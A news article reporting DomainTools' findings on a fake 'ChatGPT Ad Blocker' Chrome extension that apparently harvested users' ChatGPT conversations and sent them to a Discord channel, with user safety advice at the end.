As OpenAI introduces adverts for its free-tier users, a new wave of scams is already looking to cash in. DomainTools, a team of internet infrastructure monitors, has identified a malicious Chrome extension titled ChatGPT Ad Blocker, which was available on the official Google Chrome Web Store as recently as 10 February 2026. While users thought they were simply blocking ads from their screens, the extension was actually keeping an eye on ther their conversations with the ChatGPT AI chatbot.
The trick is simple but effective. When a user opens ChatGPT, the extension executes a process called cloning the DOM. In simple words, it creates a copy of everything on the page and then filters out images and styles to focus purely on the text (your private prompts and the AI’s answers).
According to DomainTools’ investigation, the extension flagged any text longer than 150 characters and sent the entire conversation to a private channel on the messaging app Discord. The data was intercepted by a bot, interestingly named Captain Hook, which stored the stolen conversations for the hackers to read later.
To keep the operation hidden, the tool checked a GitHub file every hour for new instructions, allowing the attackers to change their tactics remotely without the user ever suspecting a thing.
Links to major AI apps
The developer accused of running this malicious extension goes by the online handle of krittinkalra, and is not a random hacker; they are also linked to popular AI platforms Writecream and AI4ChatCo, which claim to have over 1.5 million users.
“This identified activity appears to be positioning to take advantage of the dramatic shift in OpenAI’s policy to serve up advertisements to its free tier users by distributing malicious Chrome extensions alleging to block ChatGPT ads. Specifically, the extension’s primary purpose is data harvesting, stealing the full conversation structure, user prompts, and metadata, and exfiltrating it via a Discord webhook. Again, it begs the question, does the risk extend to other apps created by the same developer?” DomainTools blog post reads.
While there is currently no proof that these other apps are stealing data, the developer’s sudden move from harmless phone software to data-stealing malware has raised serious alarms. For your information, the account had been inactive for five years before suddenly resurfacing with this malicious tool. It could be that their account was compromised to spread the malicious extension.
The cost of ‘free’
Researchers have also linked the scam to several suspicious websites, including blockaiads.com, openadblock.com, and gptadblock.com. Further probing revealed that the stolen data includes not just the chats themselves, but also technical metadata and the state of the user’s interface. While ads are annoying, having your private chats and business data broadcast to a stranger is a far higher price to pay.
DomainTools suggests that the safest way to avoid ads is through official settings, as any third-party “middleman” app is perfectly placed to listen in on your most private conversation. For now, you should treat any tool linked to this developer with suspicion.
